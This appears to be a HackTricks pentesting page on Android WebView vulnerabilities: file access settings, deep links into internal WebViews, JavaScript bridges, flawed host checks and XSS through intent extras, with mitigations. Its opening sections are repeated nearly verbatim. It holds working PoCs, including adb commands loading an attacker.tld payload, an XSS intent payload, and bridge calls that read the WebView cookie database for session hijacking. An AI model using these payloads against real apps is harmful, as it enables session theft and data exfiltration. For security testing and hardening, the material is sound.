Webview Attacks

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Guide on WebView Configurations and Security

Overview of WebView Vulnerabilities

A critical aspect of Android development involves the correct handling of WebViews. This guide highlights key configurations and security practices to mitigate risks associated with WebView usage.

WebView Example

File Access in WebViews

By default, WebViews permit file access. This functionality is controlled by the setAllowFileAccess() method, available since Android API level 3 (Cupcake 1.5). Applications with the android.permission.READ_EXTERNAL_STORAGE permission can read files from external storage using a file URL scheme (file://path/to/file).

Deprecated Features: Universal and File Access From URLs

  • Universal Access From File URLs: This deprecated feature allowed cross-origin requests from file URLs, posing a significant security risk due to potential XSS attacks. The default setting is disabled (false) for apps targeting Android Jelly Bean and newer.
    • To check this setting, use getAllowUniversalAccessFromFileURLs().
    • To modify this setting, use setAllowUniversalAccessFromFileURLs(boolean).
  • File Access From File URLs: This feature, also deprecated, controlled access to content from other file scheme URLs. Like universal access, its default is disabled for enhanced security.
    • Use getAllowFileAccessFromFileURLs() to check and setAllowFileAccessFromFileURLs(boolean) to set.

Secure File Loading

For disabling file system access while still accessing assets and resources, the setAllowFileAccess() method is used. With Android R and above, the default setting is false.

  • Check with getAllowFileAccess().
  • Enable or disable with setAllowFileAccess(boolean).

WebViewAssetLoader

The WebViewAssetLoader class is the modern approach for loading local files. It uses http(s) URLs for accessing local assets and resources, aligning with the Same-Origin policy, thus facilitating CORS management.

loadUrl

This is a common function used to load arbitrary URLs in a webviwe:

webview.loadUrl("<url here>")

Ofc, a potential attacker should never be able to control the URL that an application is going to load.

JavaScript and Intent Scheme Handling

  • JavaScript: Disabled by default in WebViews, it can be enabled via setJavaScriptEnabled(). Caution is advised as enabling JavaScript without proper safeguards can introduce security vulnerabilities.
  • Intent Scheme: WebViews can handle the intent scheme, potentially leading to exploits if not carefully managed. An example vulnerability involved an exposed WebView parameter “support_url” that could be exploited to execute cross-site scripting (XSS) attacks.

Vulnerable WebView

Exploitation example using adb:

adb.exe shell am start -n com.tmh.vulnwebview/.SupportWebView –es support_url "https://example.com/xss.html"

Javascript Bridge

A feature is provided by Android that enables JavaScript in a WebView to invoke native Android app functions. This is achieved by utilizing the addJavascriptInterface method, which integrates JavaScript with native Android functionalities, termed as a WebView JavaScript bridge. Caution is advised as this method allows all pages within the WebView to access the registered JavaScript Interface object, posing a security risk if sensitive information is exposed through these interfaces.

  • Extreme caution is required for apps targeting Android versions below 4.2 due to a vulnerability allowing remote code execution through malicious JavaScript, exploiting reflection.

Implementing a JavaScript Bridge

  • JavaScript interfaces can interact with native code, as shown in the examples where a class method is exposed to JavaScript:
@JavascriptInterface
public String getSecret() {
    return "SuperSecretPassword";
};
  • JavaScript Bridge is enabled by adding an interface to the WebView:
webView.addJavascriptInterface(new JavascriptBridge(), "javascriptBridge")
webView.reload()
  • Potential exploitation through JavaScript, for instance, via an XSS attack, enables the calling of exposed Java methods:
<script>
  alert(javascriptBridge.getSecret())
</script>
  • To mitigate risks, restrict JavaScript bridge usage to code shipped with the APK and prevent loading JavaScript from remote sources. For older devices, set the minimum API level to 17.

Reflection-based Remote Code Execution (RCE)

  • A documented method allows achieving RCE through reflection by executing a specific payload. However, the @JavascriptInterface annotation prevents unauthorized method access, limiting the attack surface.

Remote Debugging

  • Remote debugging is possible with Chrome Developer Tools, enabling interaction and arbitrary JavaScript execution within the WebView content.

Enabling Remote Debugging

  • Remote debugging can be enabled for all WebViews within an application by:
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
    WebView.setWebContentsDebuggingEnabled(true);
}
  • To conditionally enable debugging based on the application’s debuggable state:
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
    if (0 != (getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE))
    { WebView.setWebContentsDebuggingEnabled(true); }
}

Exfiltrate arbitrary files

  • Demonstrates the exfiltration of arbitrary files using an XMLHttpRequest:
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
  if (xhr.readyState == XMLHttpRequest.DONE) {
    alert(xhr.responseText)
  }
}
xhr.open(
  "GET",
  "file:///data/data/com.authenticationfailure.wheresmybrowser/databases/super_secret.db",
  true
)
xhr.send(null)

Webview Attacks

Guide on WebView Configurations and Security

Overview of WebView Vulnerabilities

A critical aspect of Android development involves the correct handling of WebViews. This guide highlights key configurations and security practices to mitigate risks associated with WebView usage.

WebView Example

File Access in WebViews

By default, WebViews permit file access. This functionality is controlled by the setAllowFileAccess() method, available since Android API level 3 (Cupcake 1.5). Applications with the android.permission.READ_EXTERNAL_STORAGE permission can read files from external storage using a file URL scheme (file://path/to/file).

Deprecated Features: Universal and File Access From URLs

  • Universal Access From File URLs: This deprecated feature allowed cross-origin requests from file URLs, posing a significant security risk due to potential XSS attacks. The default setting is disabled (false) for apps targeting Android Jelly Bean and newer.
    • To check this setting, use getAllowUniversalAccessFromFileURLs().
    • To modify this setting, use setAllowUniversalAccessFromFileURLs(boolean).
  • File Access From File URLs: This feature, also deprecated, controlled access to content from other file scheme URLs. Like universal access, its default is disabled for enhanced security.
    • Use getAllowFileAccessFromFileURLs() to check and setAllowFileAccessFromFileURLs(boolean) to set.

Secure File Loading

For disabling file system access while still accessing assets and resources, the setAllowFileAccess() method is used. With Android R and above, the default setting is false.

  • Check with getAllowFileAccess().
  • Enable or disable with setAllowFileAccess(boolean).

WebViewAssetLoader

The WebViewAssetLoader class is the modern approach for loading local files. It uses http(s) URLs for accessing local assets and resources, aligning with the Same-Origin policy, thus facilitating CORS management.

loadUrl

This is a common function used to load arbitrary URLs in a webviwe:

webview.loadUrl("<url here>")

Ofc, a potential attacker should never be able to control the URL that an application is going to load.

Deep-linking into internal WebView (custom scheme → WebView sink)

Many apps register custom schemes/paths that route a user-supplied URL into an in-app WebView. If the deep link is exported (VIEW + BROWSABLE), an attacker can force the app to render arbitrary remote content inside its WebView context.

Typical manifest pattern (simplified):

<activity android:name=".MainActivity" android:exported="true">
  <intent-filter>
    <action android:name="android.intent.action.VIEW" />
    <category android:name="android.intent.category.DEFAULT" />
    <category android:name="android.intent.category.BROWSABLE" />
    <data android:scheme="myscheme" android:host="com.example.app" />
  </intent-filter>
</activity>

Common code flow (simplified):

// Entry activity
@Override
protected void onNewIntent(Intent intent) {
    Uri deeplink = intent.getData();
    String url = deeplink.getQueryParameter("url"); // attacker-controlled
    if (deeplink.getPathSegments().get(0).equals("web")) {
        Intent i = new Intent(this, WebActivity.class);
        i.putExtra("url", url);
        startActivity(i);
    }
}

// WebActivity sink
webView.loadUrl(getIntent().getStringExtra("url"));

Attack pattern and PoC via adb:

# Template – force load in internal WebView
adb shell am start -a android.intent.action.VIEW \
  -d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"

# If a specific Activity must be targeted
adb shell am start -n com.example/.MainActivity -a android.intent.action.VIEW \
  -d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"

Impact: the remote page runs in the app WebView context (cookies/session of the app WebView profile, access to any exposed @JavascriptInterface, potential access to content:// and file:// depending on settings).

Hunting tips:

  • Grep decompiled sources for getQueryParameter("url"), loadUrl(, WebView sinks, and deep-link handlers (onCreate/onNewIntent).
  • Review the manifest for VIEW+BROWSABLE filters and custom schemes/hosts that map to activities that later start a WebView.
  • Check if there are multiple deep-link paths (e.g., an “external browser” path vs. an “internal webview” path) and prefer the one that renders inside the app.

Enabling JavaScript before verification (order-of-checks bug)

A frequent hardening mistake is enabling JavaScript or configuring relaxed WebView settings before the final allowlist/verification of the target URL completes. If the verification is inconsistent across helpers or happens too late, an attacker deep link can reach a state where:

  1. WebView settings apply (e.g., setJavaScriptEnabled(true)), and
  2. The untrusted URL is loaded with JavaScript enabled.

Bug pattern (pseudocode):

// 1) Parse/early checks
Uri u = parse(intent);
if (!looksValid(u)) return;

// 2) Configure WebView BEFORE final checks
webView.getSettings().setJavaScriptEnabled(true); // BAD: too early
configureMixedContent();

// 3) Do final verification (late)
if (!finalAllowlist(u)) return; // too late – JS already enabled

// 4) Load
webView.loadUrl(u.toString());

Why it’s exploitable

  • Inconsistent normalization: helpers split/rebuild the URL differently than the final check, creating mismatches a malicious URL can exploit.
  • Misordered pipeline: enabling JS in step 2 applies globally to the WebView instance, affecting the final load even if verification would later fail.

How to test

  • Craft deep-link payloads that pass early checks and reach the WebView configuration site.
  • Use adb to fire implicit VIEW intents delivering a url= parameter controlled by you:
adb shell am start -a android.intent.action.VIEW \
  -d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"

If exploitation succeeds, your payload executes JavaScript in the app’s WebView. From there, probe for exposed bridges:

<script>
for (let k in window) {
  try { if (typeof window[k] === 'object' || typeof window[k] === 'function') console.log('[JSI]', k); } catch(e){}
}
</script>

Defensive guidance

  • Canonicalize once; validate strictly against a single source of truth (scheme/host/path/query).
  • Only call setJavaScriptEnabled(true) after all allowlist checks pass and just before loading trusted content.
  • Avoid exposing @JavascriptInterface to untrusted origins; prefer per-origin gating.
  • Consider per-WebView instances for trusted vs untrusted content, with JS disabled by default.

JavaScript and Intent Scheme Handling

  • JavaScript: Disabled by default in WebViews, it can be enabled via setJavaScriptEnabled(). Caution is advised as enabling JavaScript without proper safeguards can introduce security vulnerabilities.
  • Intent Scheme: WebViews can handle the intent scheme, potentially leading to exploits if not carefully managed. An example vulnerability involved an exposed WebView parameter “support_url” that could be exploited to execute cross-site scripting (XSS) attacks.

Vulnerable WebView

Exploitation example using adb:

adb.exe shell am start -n com.tmh.vulnwebview/.SupportWebView –es support_url "https://example.com/xss.html"

Javascript Bridge

A feature is provided by Android that enables JavaScript in a WebView to invoke native Android app functions. This is achieved by utilizing the addJavascriptInterface method, which integrates JavaScript with native Android functionalities, termed as a WebView JavaScript bridge. Caution is advised as this method allows all pages within the WebView to access the registered JavaScript Interface object, posing a security risk if sensitive information is exposed through these interfaces.

  • Extreme caution is required for apps targeting Android versions below 4.2 due to a vulnerability allowing remote code execution through malicious JavaScript, exploiting reflection.

Implementing a JavaScript Bridge

  • JavaScript interfaces can interact with native code, as shown in the examples where a class method is exposed to JavaScript:
@JavascriptInterface
public String getSecret() {
    return "SuperSecretPassword";
};
  • JavaScript Bridge is enabled by adding an interface to the WebView:
webView.addJavascriptInterface(new JavascriptBridge(), "javascriptBridge")
webView.reload()
  • Potential exploitation through JavaScript, for instance, via an XSS attack, enables the calling of exposed Java methods:
<script>
  alert(javascriptBridge.getSecret())
</script>
  • To mitigate risks, restrict JavaScript bridge usage to code shipped with the APK and prevent loading JavaScript from remote sources. For older devices, set the minimum API level to 17.

Abusing dispatcher-style JS bridges (invokeMethod/handlerName)

A common pattern is a single exported method (e.g., @JavascriptInterface void invokeMethod(String json)) that deserializes attacker-controlled JSON into a generic object and dispatches based on a provided handler name. Typical JSON shape:

{
  "handlerName": "toBase64",
  "callbackId": "cb_12345",
  "asyncExecute": "true",
  "data": { /* handler-specific fields */ }
}

Risk: if any registered handler performs privileged actions on attacker data (e.g., direct file reads), you can call it by setting handlerName accordingly. Results are usually posted back into the page context via evaluateJavascript and a callback/promise mechanism keyed by callbackId.

Key hunting steps

  • Decompile and grep for addJavascriptInterface( to learn the bridge object name (e.g., xbridge).
  • In Chrome DevTools (chrome://inspect), type the bridge object name in the Console (e.g., xbridge) to enumerate exposed fields/methods; look for a generic dispatcher like invokeMethod.
  • Enumerate handlers by searching for classes implementing getModuleName() or registration maps.

Arbitrary file read via URI → File sinks (Base64 exfiltration)

If a handler takes a URI, calls Uri.parse(req.getUri()).getPath(), builds new File(...) and reads it without allowlists or sandbox checks, you get an arbitrary file read in the app sandbox that bypasses WebView settings like setAllowFileAccess(false) (the read happens in native code, not via the WebView network stack).

PoC to exfiltrate the Chromium WebView cookie DB (session hijack):

// Minimal callback sink so native can deliver the response
window.WebViewJavascriptBridge = {
  _handleMessageFromObjC: function (data) { console.log(data) }
};

const payload = JSON.stringify({
  handlerName: 'toBase64',
  callbackId: 'cb_' + Date.now(),
  data: { uri: 'file:///data/data/<pkg>/app_webview/Default/Cookies' }
});

xbridge.invokeMethod(payload);

Notes

  • Cookie DB paths vary across devices/providers. Common ones:
    • file:///data/data/<pkg>/app_webview/Default/Cookies
    • file:///data/data/<pkg>/app_webview_<pkg>/Default/Cookies
  • The handler returns Base64; decode to recover cookies and impersonate the user in the app’s WebView profile.

Detection tips

  • Watch for large Base64 strings returned via evaluateJavascript when using the app.
  • Grep decompiled sources for handlers that accept uri/path and convert them to new File(...).

Bypassing WebView privilege gates – endsWith() host checks

Privilege decisions (selecting a JSB-enabled Activity) often rely on host allowlists. A flawed pattern is:

String host = Uri.parse(url).getHost();
boolean z = true;
if (!host.endsWith(".trusted.com")) {
    if (!".trusted.com".endsWith(host)) {
        z = false;
    }
}
// z==true → open privileged WebView

Equivalent logic (De Morgan’s):

boolean z = host.endsWith(".trusted.com") || 
            ".trusted.com".endsWith(host);

This is not an origin check. Many unintended hosts satisfy the second clause, letting untrusted domains into the privileged Activity. Always verify scheme and host against a strict allowlist (exact match or a correct subdomain check with dot-boundaries), not endsWith tricks.

javascript:// execution primitive via loadUrl

Once inside a privileged WebView, apps sometimes execute inline JS via:

webView.loadUrl("javascript:" + jsPayload);

If an internal flow triggers loadUrl("javascript:...") in that context, injected JS executes with bridge access even if the external page wouldn’t normally be allowed. Pentest steps:

  • Grep for loadUrl("javascript: and evaluateJavascript( in the app.
  • Try to reach those code paths after forcing navigation to the privileged WebView (e.g., via a permissive deep link chooser).
  • Use the primitive to call the dispatcher (xbridge.invokeMethod(...)) and reach sensitive handlers.

Mitigations (developer checklist)

  • Strict origin verification for privileged Activities: canonicalize and compare scheme/host against an explicit allowlist; avoid endsWith-based checks. Consider Digital Asset Links when applicable.
  • Scope bridges to trusted pages only and re-check trust on every call (per-call authorization).
  • Remove or tightly guard filesystem-capable handlers; prefer content:// with allowlists/permissions over raw file:// paths.
  • Avoid loadUrl("javascript:") in privileged contexts or gate it behind strong checks.
  • Remember setAllowFileAccess(false) doesn’t protect against native file reads via the bridge.

JSB enumeration and debugging tips

  • Enable WebView remote debugging to use Chrome DevTools Console:
    • App-side (debug builds): WebView.setWebContentsDebuggingEnabled(true)
    • System-side: modules like LSPosed or Frida scripts can force-enable debugging even in release builds. Example Frida snippet for Cordova WebViews: cordova enable webview debugging
  • In DevTools, type the bridge object name (e.g., xbridge) to see exposed members and probe the dispatcher.

Reflection-based Remote Code Execution (RCE)

  • A documented method allows achieving RCE through reflection by executing a specific payload. However, the @JavascriptInterface annotation prevents unauthorized method access, limiting the attack surface.

Remote Debugging

  • Remote debugging is possible with Chrome Developer Tools, enabling interaction and arbitrary JavaScript execution within the WebView content.

Enabling Remote Debugging

  • Remote debugging can be enabled for all WebViews within an application by:
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
    WebView.setWebContentsDebuggingEnabled(true);
}
  • To conditionally enable debugging based on the application’s debuggable state:
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
    if (0 != (getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE))
    { WebView.setWebContentsDebuggingEnabled(true); }
}

Exfiltrate arbitrary files

  • Demonstrates the exfiltration of arbitrary files using an XMLHttpRequest:
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
  if (xhr.readyState == XMLHttpRequest.DONE) {
    alert(xhr.responseText)
  }
}
xhr.open(
  "GET",
  "file:///data/data/com.authenticationfailure.wheresmybrowser/databases/super_secret.db",
  true
)
xhr.send(null)

WebView XSS via Intent extras → loadData()

A frequent vulnerability is reading attacker-controlled data from an incoming Intent extra and injecting it directly into a WebView via loadData() with JavaScript enabled.

Vulnerable pattern (exported Activity reads extra and renders it as HTML):

String data = getIntent().getStringExtra("data");
if (data == null) { data = "Guest"; }
WebView webView = findViewById(R.id.webview);
webView.getSettings().setJavaScriptEnabled(true);
webView.setWebChromeClient(new WebChromeClient());
String userInput = "\n\n# Welcome\n\n" + "\n\n" + data + "\n\n";
webView.loadData(userInput, "text/html", "UTF-8");

If that Activity is exported (or reachable through an exported proxy), a malicious app can supply HTML/JS in the data extra to achieve reflected XSS:

# Replace package/component with the vulnerable Activity
adb shell am start -n com.victim/.ExportedWebViewActivity --es data '<img src=x onerror="alert(1)">'

Impact

  • Arbitrary JS in the app’s WebView context: enumerate/use @JavascriptInterface bridges, access WebView cookies/local storage, pivot to file:// or content:// depending on settings.

Mitigations

  • Treat all Intent-derived inputs as untrusted. Escape (Html.escapeHtml) or reject HTML; prefer rendering untrusted text as text, not HTML.
  • Keep JavaScript disabled unless strictly required; do not enable WebChromeClient for untrusted content.
  • If you must render templated HTML, use loadDataWithBaseURL() with a safe base and CSP; separate trusted/untrusted WebViews.
  • Avoid exposing the Activity externally or protect it with permissions when not needed.

Related

References

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks